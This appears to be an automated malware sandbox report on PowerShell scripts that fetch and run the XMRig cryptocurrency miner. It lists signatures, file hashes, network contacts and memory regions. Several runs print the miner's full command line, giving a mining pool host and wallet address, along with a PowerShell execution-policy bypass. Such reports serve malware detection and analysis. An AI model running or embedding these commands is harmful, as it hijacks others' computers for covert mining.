memory/796-108-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-109-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-110-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-111-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-112-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-113-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-114-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-115-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-116-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-117-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-118-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-119-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-120-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-121-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-122-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-123-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-124-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-125-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-126-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-127-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-128-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-129-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-130-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-131-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-132-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-133-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-134-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-135-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-136-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-137-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-138-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-139-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-140-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-141-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-142-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-143-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-144-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-145-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-146-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-147-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-148-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-149-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-150-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-151-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-152-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-153-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-154-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-155-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-156-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-157-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:48
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1782s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 588 wrote to memory of 372 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 588 wrote to memory of 372 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
Files
memory/588-3-0x00007FFE32143000-0x00007FFE32144000-memory.dmp
memory/588-5-0x00000223D74A0000-0x00000223D74C2000-memory.dmp
memory/588-6-0x00007FFE32140000-0x00007FFE32B2C000-memory.dmp
memory/588-9-0x00007FFE32140000-0x00007FFE32B2C000-memory.dmp
memory/588-10-0x00000223D75D0000-0x00000223D7646000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o2conkjh.d2u.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/588-25-0x00007FFE32140000-0x00007FFE32B2C000-memory.dmp
memory/588-48-0x00000223D73B0000-0x00000223D73C2000-memory.dmp
memory/588-61-0x00000223D73A0000-0x00000223D73AA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/372-90-0x0000016C598C0000-0x0000016C598E0000-memory.dmp
memory/372-91-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/588-92-0x00007FFE32140000-0x00007FFE32B2C000-memory.dmp
memory/588-94-0x00007FFE32143000-0x00007FFE32144000-memory.dmp
memory/372-93-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/588-95-0x00007FFE32140000-0x00007FFE32B2C000-memory.dmp
memory/372-96-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-97-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-98-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-99-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-100-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-101-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-102-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-103-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-104-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-105-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-106-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-107-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-108-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-109-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-110-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-111-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-112-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-113-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-114-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-115-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-116-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-117-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-118-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-119-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-120-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-121-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-122-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-123-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-124-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-125-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-126-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-127-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-128-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-129-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-130-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-131-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-132-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-133-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-134-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-135-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-136-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-137-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-138-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-139-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-140-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-141-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-142-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-143-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-144-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-145-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-146-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-147-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-148-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-149-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-150-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-151-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-152-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-153-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-154-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-155-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
memory/372-156-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:40
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1803s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3440,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=4404 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1392,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=4432 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/2012-0-0x00007FFDA3233000-0x00007FFDA3235000-memory.dmp
memory/2012-1-0x000002125ACF0000-0x000002125AD12000-memory.dmp
memory/2012-7-0x00007FFDA3230000-0x00007FFDA3CF1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x4h3lwc5.au2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2012-12-0x00007FFDA3230000-0x00007FFDA3CF1000-memory.dmp
memory/2012-13-0x00007FFDA3230000-0x00007FFDA3CF1000-memory.dmp
memory/2012-14-0x00007FFDA3230000-0x00007FFDA3CF1000-memory.dmp
memory/2012-15-0x00007FFDA3233000-0x00007FFDA3235000-memory.dmp
memory/2012-16-0x00007FFDA3230000-0x00007FFDA3CF1000-memory.dmp
memory/2012-17-0x00007FFDA3230000-0x00007FFDA3CF1000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:42
Platform
win11-20240508-en
Max time kernel
1673s
Max time network
1684s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/4656-0-0x00007FFD8D1F3000-0x00007FFD8D1F5000-memory.dmp
memory/4656-9-0x00000225BD400000-0x00000225BD422000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4hamumf1.jgs.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4656-10-0x00007FFD8D1F0000-0x00007FFD8DCB2000-memory.dmp
memory/4656-11-0x00007FFD8D1F0000-0x00007FFD8DCB2000-memory.dmp
memory/4656-12-0x00007FFD8D1F0000-0x00007FFD8DCB2000-memory.dmp
memory/4656-13-0x00007FFD8D1F0000-0x00007FFD8DCB2000-memory.dmp
memory/4656-14-0x00007FFD8D1F3000-0x00007FFD8D1F5000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:44
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1774s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4604 wrote to memory of 1600 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4604 wrote to memory of 1600 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
Files
memory/4604-0-0x00007FFDF4DD3000-0x00007FFDF4DD4000-memory.dmp
memory/4604-5-0x000002031F780000-0x000002031F7A2000-memory.dmp
memory/4604-7-0x00007FFDF4DD0000-0x00007FFDF57BC000-memory.dmp
memory/4604-10-0x00007FFDF4DD0000-0x00007FFDF57BC000-memory.dmp
memory/4604-9-0x000002031F930000-0x000002031F9A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ah0edcim.mus.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4604-25-0x00007FFDF4DD0000-0x00007FFDF57BC000-memory.dmp
memory/4604-48-0x000002031FAB0000-0x000002031FAC2000-memory.dmp
memory/4604-61-0x000002031F910000-0x000002031F91A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1600-90-0x0000021A2AD30000-0x0000021A2AD50000-memory.dmp
memory/1600-91-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/4604-93-0x00007FFDF4DD3000-0x00007FFDF4DD4000-memory.dmp
memory/1600-92-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
